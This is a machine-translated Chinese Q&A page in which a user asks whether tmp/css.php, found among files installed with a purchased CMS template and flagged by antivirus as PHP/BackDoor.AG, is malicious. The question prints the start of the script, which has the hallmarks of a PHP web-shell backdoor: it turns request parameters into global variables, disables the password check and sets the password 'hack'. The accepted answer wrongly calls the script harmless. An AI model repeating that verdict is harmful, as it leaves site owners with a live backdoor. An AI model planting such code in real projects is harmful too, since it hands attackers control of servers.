php - 特洛伊木马脚本？在我的服务器上

Question

我最近在网上购买了一个 cms 系统的模板，并要求开发人员为我安装它，它也不是一个便宜的模板，所以当我备份我的文件（通过 filezilla 到我的 PC）时，我有点惊讶，我的 AVG 防病毒软件提示检测到特洛伊木马 PHP/BackDoor.AG 文件作为威胁，并且该文件源自已上传到我的服务器的文件中的 tmp/css.php。

脚本如下所示：

    error_reporting(7);
 @set_magic_quotes_runtime(0);ob_start(); 
$mtime = explode(' ', microtime()); 
$starttime = $mtime[1] + $mtime[0]; 
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/'); 
//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 ); 
define('IS_WIN', DIRECTORY_SEPARATOR == '\\'); 
define('IS_COM', class_exists('COM') ? 1 : 0 ); 
define('IS_GPC', get_magic_quotes_gpc()); $dis_func = get_cfg_var('disable_functions'); define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 ); 
@set_time_limit(0);

    foreach(array('_GET','_POST') as $_request) {  
foreach($$_request as $_key => $_value) {  
if ($_key{0} != '_') {  
if (IS_GPC) {  
$_value = s_array($_value);
} $$_key = $_value; 
}}}/*===================== Â³ÃŒÃ Ã²Ã…Ã¤Ã–Ãƒ =====================*/

    $admin = array(); 
// ÃŠÃ‡Â·Ã±Ã Ã¨Ã’ÂªÃƒÃœÃ‚Ã«Ã‘Ã©Ã–Â¤, true Ã?ÂªÃ Ã¨Ã’ÂªÃ‘Ã©Ã–Â¤, false Ã?ÂªÃ–Â±Â½Ã“Â½Ã¸ÃˆÃ«.Ã Ã‚ÃƒÃ¦Ã‘Â¡Ã Ã®Ã”Ã²Ã?Ã?Ã Â§ $admin['check'] = false; 
// ÃˆÃ§Â¹Ã»Ã Ã¨Ã’ÂªÃƒÃœÃ‚Ã«Ã‘Ã©Ã–Â¤,Ã‡Ã«Ã Ã?Â¸Ã„ÂµÃ‡Ã‚Â½ÃƒÃœÃ‚Ã« $admin['pass']  = 'hack';

我不知道这意味着什么，还有更多代码，如果有人想看看我可以发布一个链接到整个事情。我只需要知道是否要从我的虚拟主机中删除它。

对此有任何帮助，我将永远感激不尽！！谢谢

score -1 · Accepted Answer

该代码只是一个非常丑陋的“un-magic-quoter”脚本。这些评论看起来像是被糟糕的 Unicode 编码所吞噬，可能不止一次。

否则，脚本对我来说似乎无害。

php - 特洛伊木马脚本？在我的服务器上

1 回答 1

Related

Reference